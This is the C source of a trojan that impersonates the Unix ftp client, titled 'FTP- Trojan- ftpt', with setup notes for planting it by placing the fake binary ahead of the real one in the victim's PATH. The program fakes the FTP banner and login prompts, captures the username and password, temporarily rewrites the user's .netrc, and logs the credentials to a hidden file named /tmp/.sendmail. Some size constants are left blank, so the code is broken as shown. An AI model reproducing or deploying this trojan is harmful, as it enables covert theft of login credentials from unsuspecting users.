/*==================================================================================
  FTP- Trojan- ftpt Ver 1.00
  The Shadow Penguin Security (http://shadowpenguin.backsection.net)
  Written by UNYUN (shadowpenguin@backsection.net)

 [Setup]

   1. Please change folowing #define value for your environment
    #define LOGFILE
    #define NETRC

   <仕込>
   %which ftp 
   /usr/bin/ftp  <--- This is real ftp. Please specify this path to #define FTPCMD
   %cc ftpt.c -o ftp <--- comple this program
   %mv ftp /tmp/temp/ <--- copy this program
   
   edit ~/.cshrc
   if set path exits in .cshrc, please set path env as follows,
   set path=(. /tmp/temp /usr/bin 
  ==================================================================================
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>

/* FTP Password Logfile */
#define     LOGFILE         "/tmp/.sendmail"

/* .netrc for target user */
#define     NETRC           "/home/hoge/.netrc"

/* Real FTP
*/
#define     FTPCMD          "/usr/bin/ftp"


#define     NETRCBAK        "/tmp/netrcbak"
#define     TIMEOUT_V       5       /* Connection Timeout value */
#define     MAX_IPLEN
#define     MAX_USERNAME
#define     MAX_PASSWORD
int         sock; 

main(argc,argv)
int argc;
char *argv[];
{
    char    *x;
    char    buf[200];
    char    user[MAX_USERNAME];
    char    pass[MAX_PASSWORD];
    struct hostent *h;
    FILE    *fp;
    void    movefile();

    if (argc==1){
        system(FTPCMD);
        exit(1);
    }
    if ((h=gethostbyname(argv[1]))==NULL){
        printf("%s: unknown host\n",argv[1]);
        system(FTPCMD);
        exit(1);
    }
    printf("Connected to %s\n",h->h_name);
    printf("220 %s FTP server ready.\n",h->h_name);
    printf("Name (%s:%s): ",h->h_name,getlogin());
    gets(user);
    if (strlen(user)==0) strcpy(user,getlogin());
    printf("331 Password required for %s\n",user);
    x=getpass("Password:");
    if (strlen(x)!=0) strcpy(pass,x);
    else strcpy(pass,"no_pass");
    movefile(NETRC,NETRCBAK);
    if ((fp=fopen(NETRC,"w"))!=NULL){
        fprintf(fp,"machine %s\n",h->h_name);
        fprintf(fp,"login %s\n",user);
        fprintf(fp,"password %s\n",pass);
        fclose(fp);
        sprintf(buf,"chmod go-rwx %s",NETRC);
        system(buf);
    }
    sprintf(buf,"%s %s",FTPCMD,h->h_name);
    system(buf);
    movefile(NETRCBAK,NETRC);
    sprintf(buf,"chmod go-rwx %s",NETRC);
    system(buf);
    if ((fp=fopen(LOGFILE,"a"))!=NULL){
        fprintf(fp,"host=%s user=%s pass=%s\n",h->h_name,user,pass);
        fclose(fp);
    }
}
void movefile(f1,f2)
char *f1,*f2;
{
    FILE    *fp1,*fp2;

    if ((fp1=fopen(f1,"rb"))==NULL) return;
    if ((fp2=fopen(f2,"wb"))==NULL){
        fclose(fp1);
        return;
    }
    for(;;){
        if (feof(fp1)) break;
        putc(getc(fp1),fp2);
    }
    fclose(fp1);
    fclose(fp2);
    remove(f1);
}
ftpt.c